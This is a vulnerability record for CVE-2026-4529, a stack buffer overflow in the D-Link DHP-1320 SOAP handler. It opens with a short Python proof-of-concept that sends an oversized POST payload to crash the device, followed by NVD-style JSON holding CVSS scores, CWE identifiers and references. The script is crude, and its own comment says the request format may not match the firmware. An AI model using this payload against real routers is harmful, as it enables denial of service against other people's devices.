CVE-2026-4529

import socket import sys # Target configuration TARGET_IP = "192.168.0.1" TARGET_PORT = 49152 # Common SOAP port for D-Link # Vulnerable component: SOAP Handler - redirect_count_down_page # The buffer overflow is triggered via a specific parameter in the SOAP request # Generating a large payload to overflow the stack overflow_size = 600 payload = b"A" * overflow_size # Constructing the malicious SOAP request packet # Note: The exact XML structure might vary based on device firmware analysis soap_packet = ( b"POST /soap_server.php HTTP/1.1\r\n" b"Host: " + TARGET_IP.encode() + b"\r\n" b"Content-Type: application/x-www-form-urlencoded\r\n" b"Content-Length: " + str(len(payload)).encode() + b"\r\n" b"\r\n" + payload ) print(f"[*] Sending payload to {TARGET_IP}:{TARGET_PORT}...") try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((TARGET_IP, TARGET_PORT)) s.send(soap_packet) s.close() print("[+] Payload sent successfully. Check device for crash.") except Exception as e: print(f"[-] Error: {e}")

{"cve": {"id": "CVE-2026-4529", "sourceIdentifier": "[email protected]", "published": "2026-03-21T23:16:51.577", "lastModified": "2026-04-30T16:33:45.063", "vulnStatus": "Analyzed", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["unsupported-when-assigned"]}], "descriptions": [{"lang": "en", "value": "A vulnerability was identified in D-Link DHP-1320 1.00WWB04. This affects the function redirect_count_down_page of the component SOAP Handler. Such manipulation leads to stack-based buffer overflow. The attack can be executed remotely. The exploit is publicly available and might be used. This vulnerability only affects products that are no longer supported by the maintainer."}, {"lang": "es", "value": "Se identificó una vulnerabilidad en D-Link DHP-1320 1.00WWB04. Esto afecta a la función redirect_count_down_page del componente Gestor SOAP. Dicha manipulación conduce a un desbordamiento de búfer basado en pila. El ataque puede ejecutarse de forma remota. El exploit está disponible públicamente y podría ser utilizado. Esta vulnerabilidad solo afecta a productos que ya no son compatibles con el mantenedor."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "baseScore": 9.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "HIGH", "exploitabilityScore": 8.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-121"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dlink:dhp-1320_firmware:1.00wwb04:*:*:*:*:*:*:*", "matchCriteriaId": "93ACDE8D-99C4-4BF9-BF0C-17BF4E44081E"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dlink:dhp-1320:a1:*:*:*:*:*:*:*", "matchCriteriaId": "0A6670EA-A632-4E64-96BD-83E4BB00F199"}]}]}], "references": [{"url": "https://github.com/xiaobor123/vul-finds/tree/main/vul-find-dhp1320-dlink", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.352317", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?id.352317", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.773932", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://www.dlink.com/", "source": "[email protected]", "tags": ["Product"]}]}}